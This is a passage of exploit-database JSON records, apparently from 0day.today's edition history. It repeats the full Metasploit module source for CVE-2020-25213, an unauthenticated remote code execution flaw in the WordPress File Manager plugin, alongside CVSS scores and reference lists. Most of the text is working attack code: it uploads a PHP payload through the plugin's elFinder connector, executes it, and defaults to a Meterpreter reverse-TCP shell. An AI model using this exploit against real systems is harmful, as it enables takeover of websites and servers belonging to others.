example elFinder connector file to have the .php\r\n extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write\r\n PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Alex Souza (w4fz5uck5)', # initial discovery and PoC\r\n 'Imran E. Dawoodjee <imran [at] threathounds.com>', # msf module\r\n ],\r\n 'References' =>\r\n [\r\n [ 'URL', 'https://github.com/w4fz5uck5/wp-file-manager-0day' ],\r\n [ 'URL', 'https://www.tenable.com/cve/CVE-2020-25213' ],\r\n [ 'CVE', '2020-25213' ]\r\n ],\r\n 'Platform' => [ 'php' ],\r\n 'Privileged' => false,\r\n 'Arch' => ARCH_PHP,\r\n 'Targets' =>\r\n [\r\n [\r\n 'WordPress File Manager 6.0-6.8',\r\n {\r\n 'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp' }\r\n }\r\n ]\r\n ],\r\n 'DisclosureDate' => '2020-09-09', # disclosure date on NVD, PoC was published on August 26 2020\r\n 'DefaultTarget' => 0\r\n )\r\n )\r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [true, 'Base path to WordPress installation', '/']),\r\n OptEnum.new('COMMAND', [true, 'elFinder commands used to exploit the vulnerability', 'upload', %w[upload mkfile+put]])\r\n ]\r\n )\r\n end\r\n\r\n def check\r\n return CheckCode::Unknown unless wordpress_and_online?\r\n\r\n # check the plugin version from readme\r\n check_plugin_version_from_readme('wp-file-manager', '6.9', '6.0')\r\n end\r\n\r\n def exploit\r\n # base path to File Manager plugin\r\n file_manager_base_uri = normalize_uri(target_uri.path, 'wp-content', 'plugins', 'wp-file-manager')\r\n # filename of the file to be uploaded/created\r\n filename = \"#{Rex::Text.rand_text_alphanumeric(6)}.php\"\r\n register_file_for_cleanup(filename)\r\n\r\n case datastore['COMMAND']\r\n when 'upload'\r\n elfinder_post(file_manager_base_uri, 'upload', 'payload' => payload.encoded, 'filename' => filename)\r\n when 'mkfile+put'\r\n elfinder_post(file_manager_base_uri, 'mkfile', 'filename' => filename)\r\n elfinder_post(file_manager_base_uri, 'put', 'payload' => payload.encoded, 'filename' => filename)\r\n end\r\n\r\n payload_uri = normalize_uri(file_manager_base_uri, 'lib', 'files', filename)\r\n print_status(\"#{peer} - Payload is at #{payload_uri}\")\r\n # execute the payload\r\n send_request_cgi('uri' => normalize_uri(payload_uri))\r\n end\r\n\r\n # make it easier to switch between \"upload\" and \"mkfile+put\" exploit methods\r\n def elfinder_post(file_manager_base_uri, elfinder_cmd, opts = {})\r\n filename = opts['filename']\r\n\r\n # prep for exploit\r\n post_data = Rex::MIME::Message.new\r\n post_data.add_part(elfinder_cmd, nil, nil, 'form-data; name=\"cmd\"')\r\n\r\n case elfinder_cmd\r\n when 'upload'\r\n post_data.add_part('l1_', nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(payload.encoded, 'application/octet-stream', nil, \"form-data; name=\\\"upload[]\\\"; filename=\\\"#{filename}\\\"\")\r\n when 'mkfile'\r\n post_data.add_part('l1_', nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(filename, nil, nil, 'form-data; name=\"name\"')\r\n when 'put'\r\n post_data.add_part(\"l1_#{Rex::Text.encode_base64(filename)}\", nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(payload.encoded, nil, nil, 'form-data; name=\"content\"')\r\n end\r\n\r\n res = send_request_cgi(\r\n 'uri' => normalize_uri(file_manager_base_uri, 'lib', 'php', 'connector.minimal.php'),\r\n 'method' => 'POST',\r\n 'ctype' => \"multipart/form-data; boundary=#{post_data.bound}\",\r\n 'data' => post_data.to_s\r\n )\r\n\r\n fail_with(Failure::Unreachable, \"#{peer} - Could not connect\") unless res\r\n fail_with(Failure::UnexpectedReply, \"#{peer} - Unexpected HTTP response code: #{res.code}\") unless res.code == 200\r\n end\r\nend\n\n# 0day.today [2021-09-07] #", "category": "", "verified": false}, "lastseen": "2021-09-07T06:17:08", "differentElements": ["sourceData"], "edition": 7}, {"bulletin": {"id": "1337DAY-ID-35215", "vendorId": null, "hash": "a10f378a1b4117ddb9c68d8cb19f9ab2", "type": "zdt", "bulletinFamily": "exploit", "title": "WordPress File Manager 6.8 Remote Code Execution Exploit", "description": "The WordPress File Manager (wp-file-manager) plugin versions 6.0 through 6.8 allows remote attackers to upload and execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory.", "published": "2020-11-10T00:00:00", "modified": "2020-11-10T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/35215", "reporter": "zdt", "references": [], "cvelist": ["CVE-2020-25213"], "immutableFields": [], "lastseen": "2021-09-07T22:11:46", "history": [], "viewCount": 3, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:AA7F75B5-85DC-4246-932B-C13A3A39B197"]}, {"type": "cve", "idList": ["CVE-2020-25213"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:160003"]}, {"type": "wpexploit", "idList": ["WPEX-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"]}, {"type": "nessus", "idList": ["WORDPRESS_PLUGIN_WP_FILE_MANAGER_6_9_RCE.NASL"]}, {"type": "dsquare", "idList": ["E-722"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:7D610378313C0D3F9F5525CC2D5907A7"]}, {"type": "thn", "idList": ["THN:7FD924637D99697D78D53283817508DA"]}], "modified": "2021-09-07T22:11:46", "rev": 2}, "score": {"value": 7.2, "vector": "NONE", "modified": "2021-09-07T22:11:46", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/35215", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n\r\n include Msf::Exploit::Remote::HTTP::Wordpress\r\n prepend Msf::Exploit::Remote::AutoCheck\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(\r\n update_info(\r\n info,\r\n 'Name' => 'WordPress File Manager Unauthenticated Remote Code Execution',\r\n 'Description' => %q{\r\n The File Manager (wp-file-manager) plugin from 6.0 to 6.8 for WordPress allows remote attackers to upload and\r\n execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php\r\n extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write\r\n PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Alex Souza (w4fz5uck5)', # initial discovery and PoC\r\n 'Imran E. Dawoodjee <imran [at] threathounds.com>', # msf module\r\n ],\r\n 'References' =>\r\n [\r\n [ 'URL', 'https://github.com/w4fz5uck5/wp-file-manager-0day' ],\r\n [ 'URL', 'https://www.tenable.com/cve/CVE-2020-25213' ],\r\n [ 'CVE', '2020-25213' ]\r\n ],\r\n 'Platform' => [ 'php' ],\r\n 'Privileged' => false,\r\n 'Arch' => ARCH_PHP,\r\n 'Targets' =>\r\n [\r\n [\r\n 'WordPress File Manager 6.0-6.8',\r\n {\r\n 'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp' }\r\n }\r\n ]\r\n ],\r\n 'DisclosureDate' => '2020-09-09', # disclosure date on NVD, PoC was published on August 26 2020\r\n 'DefaultTarget' => 0\r\n )\r\n )\r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [true, 'Base path to WordPress installation', '/']),\r\n OptEnum.new('COMMAND', [true, 'elFinder commands used to exploit the vulnerability', 'upload', %w[upload mkfile+put]])\r\n ]\r\n )\r\n end\r\n\r\n def check\r\n return CheckCode::Unknown unless wordpress_and_online?\r\n\r\n # check the plugin version from readme\r\n check_plugin_version_from_readme('wp-file-manager', '6.9', '6.0')\r\n end\r\n\r\n def exploit\r\n # base path to File Manager plugin\r\n file_manager_base_uri = normalize_uri(target_uri.path, 'wp-content', 'plugins', 'wp-file-manager')\r\n # filename of the file to be uploaded/created\r\n filename = \"#{Rex::Text.rand_text_alphanumeric(6)}.php\"\r\n register_file_for_cleanup(filename)\r\n\r\n case datastore['COMMAND']\r\n when 'upload'\r\n elfinder_post(file_manager_base_uri, 'upload', 'payload' => payload.encoded, 'filename' => filename)\r\n when 'mkfile+put'\r\n elfinder_post(file_manager_base_uri, 'mkfile', 'filename' => filename)\r\n elfinder_post(file_manager_base_uri, 'put', 'payload' => payload.encoded, 'filename' => filename)\r\n end\r\n\r\n payload_uri = normalize_uri(file_manager_base_uri, 'lib', 'files', filename)\r\n print_status(\"#{peer} - Payload is at #{payload_uri}\")\r\n # execute the payload\r\n send_request_cgi('uri' => normalize_uri(payload_uri))\r\n end\r\n\r\n # make it easier to switch between \"upload\" and \"mkfile+put\" exploit methods\r\n def elfinder_post(file_manager_base_uri, elfinder_cmd, opts = {})\r\n filename = opts['filename']\r\n\r\n # prep for exploit\r\n post_data = Rex::MIME::Message.new\r\n post_data.add_part(elfinder_cmd, nil, nil, 'form-data; name=\"cmd\"')\r\n\r\n case elfinder_cmd\r\n when 'upload'\r\n post_data.add_part('l1_', nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(payload.encoded, 'application/octet-stream', nil, \"form-data; name=\\\"upload[]\\\"; filename=\\\"#{filename}\\\"\")\r\n when 'mkfile'\r\n post_data.add_part('l1_', nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(filename, nil, nil, 'form-data; name=\"name\"')\r\n when 'put'\r\n post_data.add_part(\"l1_#{Rex::Text.encode_base64(filename)}\", nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(payload.encoded, nil, nil, 'form-data; name=\"content\"')\r\n end\r\n\r\n res = send_request_cgi(\r\n 'uri' => normalize_uri(file_manager_base_uri, 'lib', 'php', 'connector.minimal.php'),\r\n 'method' => 'POST',\r\n 'ctype' => \"multipart/form-data; boundary=#{post_data.bound}\",\r\n 'data' => post_data.to_s\r\n )\r\n\r\n fail_with(Failure::Unreachable, \"#{peer} - Could not connect\") unless res\r\n fail_with(Failure::UnexpectedReply, \"#{peer} - Unexpected HTTP response code: #{res.code}\") unless res.code == 200\r\n end\r\nend\n\n# 0day.today [2021-09-08] #", "category": "", "verified": false}, "lastseen": "2021-09-07T22:11:46", "differentElements": ["sourceData"], "edition": 8}, {"bulletin": {"id": "1337DAY-ID-35215", "vendorId": null, "hash": "716f76dd4def03ad5096ebc1e28064fb", "type": "zdt", "bulletinFamily": "exploit", "title": "WordPress File Manager 6.8 Remote Code Execution Exploit", "description": "The WordPress File Manager (wp-file-manager) plugin versions 6.0 through 6.8 allows remote attackers to upload and execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory.", "published": "2020-11-10T00:00:00", "modified": "2020-11-10T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/35215", "reporter": "zdt", "references": [], "cvelist": ["CVE-2020-25213"], "immutableFields": [], "lastseen": "2021-09-08T22:10:13", "history": [], "viewCount": 3, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:AA7F75B5-85DC-4246-932B-C13A3A39B197"]}, {"type": "cve", "idList": ["CVE-2020-25213"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:160003"]}, {"type": "wpexploit", "idList": ["WPEX-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"]}, {"type": "nessus", "idList": ["WORDPRESS_PLUGIN_WP_FILE_MANAGER_6_9_RCE.NASL"]}, {"type": "dsquare", "idList": ["E-722"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:7D610378313C0D3F9F5525CC2D5907A7"]}, {"type": "thn", "idList": ["THN:7FD924637D99697D78D53283817508DA"]}], "modified": "2021-09-08T22:10:13", "rev": 2}, "score": {"value": 7.2, "vector": "NONE", "modified": "2021-09-08T22:10:13", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/35215", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n\r\n include Msf::Exploit::Remote::HTTP::Wordpress\r\n prepend Msf::Exploit::Remote::AutoCheck\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(\r\n update_info(\r\n info,\r\n 'Name' => 'WordPress File Manager Unauthenticated Remote Code Execution',\r\n 'Description' => %q{\r\n The File Manager (wp-file-manager) plugin from 6.0 to 6.8 for WordPress allows remote attackers to upload and\r\n execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php\r\n extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write\r\n PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Alex Souza (w4fz5uck5)', # initial discovery and PoC\r\n 'Imran E. Dawoodjee <imran [at] threathounds.com>', # msf module\r\n ],\r\n 'References' =>\r\n [\r\n [ 'URL', 'https://github.com/w4fz5uck5/wp-file-manager-0day' ],\r\n [ 'URL', 'https://www.tenable.com/cve/CVE-2020-25213' ],\r\n [ 'CVE', '2020-25213' ]\r\n ],\r\n 'Platform' => [ 'php' ],\r\n 'Privileged' => false,\r\n 'Arch' => ARCH_PHP,\r\n 'Targets' =>\r\n [\r\n [\r\n 'WordPress File Manager 6.0-6.8',\r\n {\r\n 'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp' }\r\n }\r\n ]\r\n ],\r\n 'DisclosureDate' => '2020-09-09', # disclosure date on NVD, PoC was published on August 26 2020\r\n 'DefaultTarget' => 0\r\n )\r\n )\r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [true, 'Base path to WordPress installation', '/']),\r\n OptEnum.new('COMMAND', [true, 'elFinder commands used to exploit the vulnerability', 'upload', %w[upload mkfile+put]])\r\n ]\r\n )\r\n end\r\n\r\n def check\r\n return CheckCode::Unknown unless wordpress_and_online?\r\n\r\n # check the plugin version from readme\r\n check_plugin_version_from_readme('wp-file-manager', '6.9', '6.0')\r\n end\r\n\r\n def exploit\r\n # base path to File Manager plugin\r\n file_manager_base_uri = normalize_uri(target_uri.path, 'wp-content', 'plugins', 'wp-file-manager')\r\n # filename of the file to be uploaded/created\r\n filename = \"#{Rex::Text.rand_text_alphanumeric(6)}.php\"\r\n register_file_for_cleanup(filename)\r\n\r\n case datastore['COMMAND']\r\n when 'upload'\r\n elfinder_post(file_manager_base_uri, 'upload', 'payload' => payload.encoded, 'filename' => filename)\r\n when 'mkfile+put'\r\n elfinder_post(file_manager_base_uri, 'mkfile', 'filename' => filename)\r\n elfinder_post(file_manager_base_uri, 'put', 'payload' => payload.encoded, 'filename' => filename)\r\n end\r\n\r\n payload_uri = normalize_uri(file_manager_base_uri, 'lib', 'files', filename)\r\n print_status(\"#{peer} - Payload is at #{payload_uri}\")\r\n # execute the payload\r\n send_request_cgi('uri' => normalize_uri(payload_uri))\r\n end\r\n\r\n # make it easier to switch between \"upload\" and \"mkfile+put\" exploit methods\r\n def elfinder_post(file_manager_base_uri, elfinder_cmd, opts = {})\r\n filename = opts['filename']\r\n\r\n # prep for exploit\r\n post_data = Rex::MIME::Message.new\r\n post_data.add_part(elfinder_cmd, nil, nil, 'form-data; name=\"cmd\"')\r\n\r\n case elfinder_cmd\r\n when 'upload'\r\n post_data.add_part('l1_', nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(payload.encoded, 'application/octet-stream', nil, \"form-data; name=\\\"upload[]\\\"; filename=\\\"#{filename}\\\"\")\r\n when 'mkfile'\r\n post_data.add_part('l1_', nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(filename, nil, nil, 'form-data; name=\"name\"')\r\n when 'put'\r\n post_data.add_part(\"l1_#{Rex::Text.encode_base64(filename)}\", nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(payload.encoded, nil, nil, 'form-data; name=\"content\"')\r\n end\r\n\r\n res = send_request_cgi(\r\n 'uri' => normalize_uri(file_manager_base_uri, 'lib', 'php', 'connector.minimal.php'),\r\n 'method' => 'POST',\r\n 'ctype' => \"multipart/form-data; boundary=#{post_data.bound}\",\r\n 'data' => post_data.to_s\r\n )\r\n\r\n fail_with(Failure::Unreachable, \"#{peer} - Could not connect\") unless res\r\n fail_with(Failure::UnexpectedReply, \"#{peer} - Unexpected HTTP response code: #{res.code}\") unless res.code == 200\r\n end\r\nend\n\n# 0day.today [2021-09-09] #", "category": "", "verified": false}, "lastseen": "2021-09-08T22:10:13", "differentElements": ["sourceData"], "edition": 9}, {"bulletin": {"id": "1337DAY-ID-35215", "vendorId": null, "hash": "7a54be0dd6ababdbaa2fcc46516743b3", "type": "zdt", "bulletinFamily": "exploit", "title": "WordPress File Manager 6.8 Remote Code Execution Exploit", "description": "The WordPress File Manager (wp-file-manager) plugin versions 6.0 through 6.8 allows remote attackers to upload and execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory.", "published": "2020-11-10T00:00:00", "modified": "2020-11-10T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/35215", "reporter": "zdt", "references": [], "cvelist": ["CVE-2020-25213"], "immutableFields": [], "lastseen": "2021-09-09T22:26:05", "history": [], "viewCount": 3, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:AA7F75B5-85DC-4246-932B-C13A3A39B197"]}, {"type": "cve", "idList": ["CVE-2020-25213"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:160003"]}, {"type": "wpexploit", "idList": ["WPEX-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"]}, {"type": "nessus", "idList": ["WORDPRESS_PLUGIN_WP_FILE_MANAGER_6_9_RCE.NASL"]}, {"type": "dsquare", "idList": ["E-722"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:7D610378313C0D3F9F5525CC2D5907A7"]}, {"type": "thn", "idList": ["THN:7FD924637D99697D78D53283817508DA"]}], "modified": "2021-09-09T22:26:05", "rev": 2}, "score": {"value": 7.2, "vector": "NONE", "modified": "2021-09-09T22:26:05", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/35215", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n\r\n include Msf::Exploit::Remote::HTTP::Wordpress\r\n prepend Msf::Exploit::Remote::AutoCheck\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(\r\n update_info(\r\n info,\r\n 'Name' => 'WordPress File Manager Unauthenticated Remote Code Execution',\r\n 'Description' => %q{\r\n The File Manager (wp-file-manager) plugin from 6.0 to 6.8 for WordPress allows remote attackers to upload and\r\n execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php\r\n extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write\r\n PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Alex Souza (w4fz5uck5)', # initial discovery and PoC\r\n 'Imran E. Dawoodjee <imran [at] threathounds.com>', # msf module\r\n ],\r\n 'References' =>\r\n [\r\n [ 'URL', 'https://github.com/w4fz5uck5/wp-file-manager-0day' ],\r\n [ 'URL', 'https://www.tenable.com/cve/CVE-2020-25213' ],\r\n [ 'CVE', '2020-25213' ]\r\n ],\r\n 'Platform' => [ 'php' ],\r\n 'Privileged' => false,\r\n 'Arch' => ARCH_PHP,\r\n 'Targets' =>\r\n [\r\n [\r\n 'WordPress File Manager 6.0-6.8',\r\n {\r\n 'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp' }\r\n }\r\n ]\r\n ],\r\n 'DisclosureDate' => '2020-09-09', # disclosure date on NVD, PoC was published on August 26 2020\r\n 'DefaultTarget' => 0\r\n )\r\n )\r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [true, 'Base path to WordPress installation', '/']),\r\n OptEnum.new('COMMAND', [true, 'elFinder commands used to exploit the vulnerability', 'upload', %w[upload mkfile+put]])\r\n ]\r\n )\r\n end\r\n\r\n def check\r\n return CheckCode::Unknown unless wordpress_and_online?\r\n\r\n # check the plugin version from readme\r\n check_plugin_version_from_readme('wp-file-manager', '6.9', '6.0')\r\n end\r\n\r\n def exploit\r\n # base path to File Manager plugin\r\n file_manager_base_uri = normalize_uri(target_uri.path, 'wp-content', 'plugins', 'wp-file-manager')\r\n # filename of the file to be uploaded/created\r\n filename = \"#{Rex::Text.rand_text_alphanumeric(6)}.php\"\r\n register_file_for_cleanup(filename)\r\n\r\n case datastore['COMMAND']\r\n when 'upload'\r\n elfinder_post(file_manager_base_uri, 'upload', 'payload' => payload.encoded, 'filename' => filename)\r\n when 'mkfile+put'\r\n elfinder_post(file_manager_base_uri, 'mkfile', 'filename' => filename)\r\n elfinder_post(file_manager_base_uri, 'put', 'payload' => payload.encoded, 'filename' => filename)\r\n end\r\n\r\n payload_uri = normalize_uri(file_manager_base_uri, 'lib', 'files', filename)\r\n print_status(\"#{peer} - Payload is at #{payload_uri}\")\r\n # execute the payload\r\n send_request_cgi('uri' => normalize_uri(payload_uri))\r\n end\r\n\r\n # make it easier to switch between \"upload\" and \"mkfile+put\" exploit methods\r\n def elfinder_post(file_manager_base_uri, elfinder_cmd, opts = {})\r\n filename = opts['filename']\r\n\r\n # prep for exploit\r\n post_data = Rex::MIME::Message.new\r\n post_data.add_part(elfinder_cmd, nil, nil, 'form-data; name=\"cmd\"')\r\n\r\n case elfinder_cmd\r\n when 'upload'\r\n post_data.add_part('l1_', nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(payload.encoded, 'application/octet-stream', nil, \"form-data; name=\\\"upload[]\\\"; filename=\\\"#{filename}\\\"\")\r\n when 'mkfile'\r\n post_data.add_part('l1_', nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(filename, nil, nil, 'form-data; name=\"name\"')\r\n when 'put'\r\n post_data.add_part(\"l1_#{Rex::Text.encode_base64(filename)}\", nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(payload.encoded, nil, nil, 'form-data; name=\"content\"')\r\n end\r\n\r\n res = send_request_cgi(\r\n 'uri' => normalize_uri(file_manager_base_uri, 'lib', 'php', 'connector.minimal.php'),\r\n 'method' => 'POST',\r\n 'ctype' => \"multipart/form-data; boundary=#{post_data.bound}\",\r\n 'data' => post_data.to_s\r\n )\r\n\r\n fail_with(Failure::Unreachable, \"#{peer} - Could not connect\") unless res\r\n fail_with(Failure::UnexpectedReply, \"#{peer} - Unexpected HTTP response code: #{res.code}\") unless res.code == 200\r\n end\r\nend\n\n# 0day.today [2021-09-10] #", "category": "", "verified": false}, "lastseen": "2021-09-09T22:26:05", "differentElements": ["sourceData"], "edition": 10}, {"bulletin": {"id": "1337DAY-ID-35215", "vendorId": null, "hash": "08b7625d8f931e33d97fb1e448c9123a", "type": "zdt", "bulletinFamily": "exploit", "title": "WordPress File Manager 6.8 Remote Code Execution Exploit", "description": "The WordPress File Manager (wp-file-manager) plugin versions 6.0 through 6.8 allows remote attackers to upload and execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory.", "published": "2020-11-10T00:00:00", "modified": "2020-11-10T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/35215", "reporter": "zdt", "references": [], "cvelist": ["CVE-2020-25213"], "immutableFields": [], "lastseen": "2021-09-10T22:12:40", "history": [], "viewCount": 3, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:AA7F75B5-85DC-4246-932B-C13A3A39B197"]}, {"type": "cve", "idList": ["CVE-2020-25213"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:160003"]}, {"type": "wpexploit", "idList": ["WPEX-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"]}, {"type": "nessus", "idList": ["WORDPRESS_PLUGIN_WP_FILE_MANAGER_6_9_RCE.NASL"]}, {"type": "dsquare", "idList": ["E-722"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:7D610378313C0D3F9F5525CC2D5907A7"]}, {"type": "thn", "idList": ["THN:7FD924637D99697D78D53283817508DA"]}], "modified": "2021-09-09T22:26:05", "rev": 2}, "score": {"value": 7.2, "vector": 